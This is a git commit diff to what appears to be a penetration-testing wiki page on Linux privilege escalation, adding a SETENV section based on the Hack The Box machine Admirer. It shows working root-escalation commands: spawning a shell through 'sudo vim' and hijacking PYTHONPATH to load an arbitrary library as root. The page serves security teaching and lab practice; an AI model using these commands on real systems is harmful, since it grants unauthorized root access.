GitBook: [master] one page modified
This commit is contained in:
parent
aae1c80da6
commit
a36f7f8a61
@ -688,7 +688,6 @@ Sudo configuration might allow a user to execute some command with another user
|
|||||||
|
|
||||||
```text
|
```text
|
||||||
$ sudo -l
|
$ sudo -l
|
||||||
|
|
||||||
User demo may run the following commands on crashlab:
|
User demo may run the following commands on crashlab:
|
||||||
(root) NOPASSWD: /usr/bin/vim
|
(root) NOPASSWD: /usr/bin/vim
|
||||||
```
|
```
|
||||||
@ -699,6 +698,22 @@ In this example the user `demo` can run `vim` as `root`, it is now trivial to ge
|
|||||||
sudo vim -c '!sh'
|
sudo vim -c '!sh'
|
||||||
```
|
```
|
||||||
|
|
||||||
|
### SETENV
|
||||||
|
|
||||||
|
This directive allows the user to **set an environment variable** while executing something:
|
||||||
|
|
||||||
|
```bash
|
||||||
|
$ sudo -l
|
||||||
|
User waldo may run the following commands on admirer:
|
||||||
|
(ALL) SETENV: /opt/scripts/admin_tasks.sh
|
||||||
|
```
|
||||||
|
|
||||||
|
This example, **based on HTB machine Admirer**, was **vulnerable** to **PYTHONPATH hijacking** in order to load an arbitrary python library while executing the script as root:
|
||||||
|
|
||||||
|
```bash
|
||||||
|
sudo PYTHONPATH=/dev/shm/ /opt/scripts/admin_tasks.sh
|
||||||
|
```
|
||||||
|
|
||||||
### Sudo execution bypassing paths
|
### Sudo execution bypassing paths
|
||||||
|
|
||||||
**Jump** to read other files or use **symlinks**. For example in sudeores file: _hacker10 ALL= \(root\) /bin/less /var/log/\*_
|
**Jump** to read other files or use **symlinks**. For example in sudeores file: _hacker10 ALL= \(root\) /bin/less /var/log/\*_
|
||||||
|
Loading…
Reference in New Issue
Block a user